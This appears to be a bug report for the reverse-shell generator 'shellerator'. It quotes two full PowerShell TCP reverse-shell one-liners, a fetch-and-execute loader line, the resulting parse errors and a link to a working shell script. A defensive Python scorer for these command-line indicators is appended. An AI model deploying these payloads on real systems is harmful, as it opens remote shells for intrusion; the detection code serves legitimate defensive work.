shellerator
[BUG] Powershell reverseshell does not work
Both generated PowerShell reverse shells do not work:
I used the following command to generate the reverse shells:
# shellerator --type powershell --lport 443 --lhost 127.0.0.1
[1] powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("127.0.0.1",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
[2] powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
CLI command used
/root/.local/bin/shellerator --reverse-shell --type powershell --lhost 127.0.0.1 --lport 443
Running them on a Windows host yields a lot of syntax errors:
> Invoke-RestMethod '127.0.0.1/rev1.ps1' | Invoke-Expression
At line:1 char:75
+ ... System.Net.Sockets.TCPClient('127.0.0.1',443); = .GetStream();[byte[ ...
+ ~
An expression was expected after '('.
At line:1 char:122
+ ... = .GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length ...
+ ~
Missing expression after ','.
At line:1 char:123
+ ... tream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0 ...
+ ~~~~~~~
Unexpected token '.Length' in expression or statement.
At line:1 char:122
+ ... = .GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length ...
+ ~
Missing closing ')' in expression.
At line:1 char:132
+ ... eam();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){ ...
+ ~
Missing statement body in while loop.
At line:1 char:138
+ ... byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){; = (Ne ...
+ ~
Unexpected token ')' in expression or statement.
At line:1 char:203
+ ... = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = ...
+ ~
Missing ')' in method call.
At line:1 char:206
+ ... New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (i ...
+ ~
Missing expression after ',' in pipeline element.
At line:1 char:139
+ ... yte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){; = (New ...
+ ~
Missing closing '}' in statement block or type definition.
At line:1 char:207
+ ... w-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (iex ...
+ ~
Unexpected token ')' in expression or statement.
Not all parse errors were reported. Correct the reported errors and try again.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ExpectedExpression
Fix: Use a working reverse shell like this one:
https://gist.githubusercontent.com/egre55/c058744a4240af6515eb32b2d33fbed3/raw/3ad91872713d60888dca95850c3f6e706231cb40/powershell_reverse_shell.ps1
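A defender-side check for the kind of command lines quoted in this report, added here as an example and not part of shellerator or of the reporter's post: it scores PowerShell process command lines on indicators visible in the generated one-liners (the TCPClient/GetStream pair, iex, the -NoP/-W Hidden/-Exec Bypass switches, and remote loading via Invoke-RestMethod as in the loader line). The indicator labels and weights, the THRESHOLD value, and the 4688-style sample events are all constructed for this example (event 0 abbreviates payload [2], event 1 is the loader line, event 2 is a benign control).

```python
import re
from dataclasses import dataclass, field

# Indicators drawn from strings that appear in the two generated one-liners and
# the loader line quoted in the issue. Labels and weights are this example's own.
INDICATORS = [
    ("tcp-client",    re.compile(r"System\.Net\.Sockets\.TCPClient", re.I), 3),
    ("stream-io",     re.compile(r"\.GetStream\(\)", re.I),                 2),
    ("iex",           re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),   2),
    ("remote-load",   re.compile(r"Invoke-RestMethod|Invoke-WebRequest|DownloadString", re.I), 2),
    ("hidden-window", re.compile(r"-W(?:indowStyle)?\s+Hidden\b", re.I),    1),
    ("exec-bypass",   re.compile(r"-Exec(?:utionPolicy)?\s+Bypass\b", re.I), 1),
    ("no-profile",    re.compile(r"-NoP(?:rofile)?\b", re.I),               1),
]
THRESHOLD = 4  # assumed tuning value; raise it if legitimate admin scripts trip it


@dataclass
class Verdict:
    hits: list = field(default_factory=list)
    score: int = 0

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def score_command_line(cmdline: str) -> Verdict:
    """Return which indicators fired on one process command line and the weighted total."""
    verdict = Verdict()
    for name, rx, weight in INDICATORS:
        if rx.search(cmdline):
            verdict.hits.append(name)
            verdict.score += weight
    return verdict


# Constructed 4688-style records (not real telemetry). Event 0 abbreviates
# payload [2] from the report, event 1 is the loader line from the report,
# event 2 is a benign scheduled backup script used as a control.
SAMPLE_EVENTS = [
    {"EventID": 4688,
     "CommandLine": "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',443);"
                    "$stream = $client.GetStream();...;$sendback = (iex $data 2>&1 | Out-String );...;$client.Close()\""},
    {"EventID": 4688,
     "CommandLine": "powershell -c \"Invoke-RestMethod '127.0.0.1/rev1.ps1' | Invoke-Expression\""},
    {"EventID": 4688,
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1"},
]


def scan_events(events):
    """Score every event; returns a list of (event index, Verdict) pairs."""
    return [(i, score_command_line(e["CommandLine"])) for i, e in enumerate(events)]


def flagged_indices(events):
    """Indices of events whose weighted score reaches THRESHOLD."""
    return [i for i, v in scan_events(events) if v.suspicious]


if __name__ == "__main__":
    for i, v in scan_events(SAMPLE_EVENTS):
        print(f"event {i}: score={v.score} suspicious={v.suspicious} hits={v.hits}")
```

Run as-is to see the three verdicts. The generator's launch switches alone (event 2) score only 2, so the weight sits on the socket, stream and iex traits and on remote loading; that is deliberate, since -NoProfile and -ExecutionPolicy Bypass are common in legitimate scheduled tasks.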